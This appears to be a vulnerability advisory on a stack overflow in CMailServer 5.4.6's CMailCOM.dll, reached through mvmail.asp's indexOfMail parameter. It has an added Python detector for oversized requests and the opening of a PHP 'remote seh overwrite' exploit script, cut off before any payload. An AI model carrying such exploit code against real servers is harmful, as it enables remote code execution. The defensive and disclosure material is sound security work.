Published: 2008-07-06
Updated: 2008-07-08
Affected systems:
YoungZSoft CMailServer 5.4.6
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 30098
CMailServer is an email server program that includes a web-based mail service.
The POP3 Class ActiveX control installed by CMailServer (CMailCOM.dll, CLSID 6971D9B8-B53E-4C25-A414-76199768A592) does not properly validate the input parameter passed to the MoveToFolder() method. If a remote attacker submits a POST request to mvmail.asp with an overly long indexOfMail parameter, a stack overflow can be triggered, leading to arbitrary code execution. The CMailCOM.SMTP class (CLSID 0609792F-AB56-4CB6-8909-19CDF72CB2A0) has similar overflows when handling the AddAttach, SetSubject, SetBcc, SetBody, SetCc, SetFrom, SetTo and SetFromUID methods.
<* Source: bruiser
Link: http://secunia.com/advisories/30940/
*>
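Added example (not part of the original advisory and not vendor code): a request check that flags POSTs to mvmail.asp whose indexOfMail value is oversized or non-numeric, run over constructed sample requests. The 16-character limit, the decimal-index rule, the host name and the extra form fields are assumptions made for illustration.

```python
from urllib.parse import parse_qsl

# Assumptions, not from the advisory: a legitimate indexOfMail value is a short
# decimal index, and 16 characters is a generous upper bound for it.
MAX_INDEX_LEN = 16
TARGET_SCRIPT = "/mvmail.asp"
PARAM = "indexofmail"  # ASP form field names are case-insensitive


def inspect_request(raw):
    """Return a list of findings for one raw HTTP request (empty if clean)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    parts = head.split(b"\r\n", 1)[0].decode("latin-1").split(" ")
    if len(parts) < 2:
        return ["malformed request line"]
    method, path = parts[0].upper(), parts[1].split("?", 1)[0].lower()
    if method != "POST" or not path.endswith(TARGET_SCRIPT):
        return []
    findings = []
    # keep_blank_values=True so an empty parameter is still examined
    for name, value in parse_qsl(body.decode("latin-1"), keep_blank_values=True):
        if name.lower() != PARAM:
            continue
        if len(value) > MAX_INDEX_LEN:
            findings.append("indexOfMail length %d exceeds %d" % (len(value), MAX_INDEX_LEN))
        if not (value.isascii() and value.isdigit()):
            findings.append("indexOfMail is not a decimal index")
    return findings


def _post(path, body):
    """Build a constructed sample request (host and extra fields are made up)."""
    return ("POST %s HTTP/1.1\r\nHost: mail.example\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            "Content-Length: %d\r\n\r\n%s" % (path, len(body), body)).encode("latin-1")


SAMPLES = {
    "normal": _post("/mail/mvmail.asp", "indexOfMail=3&folder=Trash"),
    "oversized": _post("/mail/mvmail.asp", "indexOfMail=" + "A" * 2000),
    "mixed case": _post("/MAIL/MvMail.ASP", "INDEXOFMAIL=" + "9" * 40),
    "other page": _post("/mail/login.asp", "user=" + "A" * 2000),
}

if __name__ == "__main__":
    for label, request in SAMPLES.items():
        print(label, "->", inspect_request(request) or "clean")
```

The check only parses application/x-www-form-urlencoded bodies; multipart or chunked requests need to be decoded before they are passed in.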
Test method:
--------------------------------------------------------------------------------
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use it at your own risk!
<?php
error_reporting(7);
// Command-line arguments: target host, path to the webmail directory, optional port
$host = $argv[1];
$path = $argv[2];
$argv[3] ? $port = (int) $argv[3] : $port = 80;
print("CMailServer 5.4.6 mvmail.asp/CMailCOM.dll remote seh overwrite\n".
      "exploit\n".
      "by Nine:Situations:Group::bookoo\n");
// Print usage and stop when the path argument is missing
$argv[2] ? print("attackin'...\n") : die("syntax: php ".$argv[0]." [host] [path] [[port]]\n".
      "example: php ".$argv[0]." 192.168.0.1 /mail/\n".
      "      ''  php ".$argv[0]." 192.168.0.1 / 81\n");
$url = "http://$host:$port";
// Load the cURL extension at runtime, choosing the library name by platform
$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
$win ? dl("php_curl.dll") : dl("php_curl.so");